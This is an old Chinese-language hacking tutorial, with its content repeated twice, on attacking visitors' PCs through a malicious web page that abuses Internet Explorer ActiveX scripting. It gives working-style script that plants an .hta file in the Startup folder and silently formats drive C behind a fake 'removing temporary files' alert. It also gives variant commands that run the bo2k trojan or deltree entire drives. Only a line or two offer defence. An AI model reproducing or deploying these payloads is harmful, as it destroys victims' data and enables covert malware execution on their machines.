超酷手段:通過網頁攻擊客戶端機
文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的。注:文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的.
防護辦法:不執行不知名的Active控件或者把機器中那些不太常用的指令,如format.exe,進行更名.
文章作者︰f\*\*k
前敘︰
這項技術是在沒多久以前台灣所流行的攻擊法,你知道利用漏洞的厲害在哪嗎?
這一項教學就是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的
攻擊方法。
教學開始︰
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應該就看得出來其中精隨)
現在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"
這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。
這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。
最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。
執行其他攻擊指令的方法︰
只要修改「start.exe /m format c:/q /autotest /u」這一項便形。
start.exe /m format c:/q /autotest /u
其中的「c:」可以換做其他的硬碟。
(path)\bo2k.exe
執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘︰
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應該就看得出來其中精隨)
現在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"
這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。
這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。
最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。
執行其他攻擊指令的方法︰
只要修改「start.exe /m format c:/q /autotest /u」這一項便形。
start.exe /m format c:/q /autotest /u
其中的「c:」可以換做其他的硬碟。
(path)\bo2k.exe
執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘︰
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
|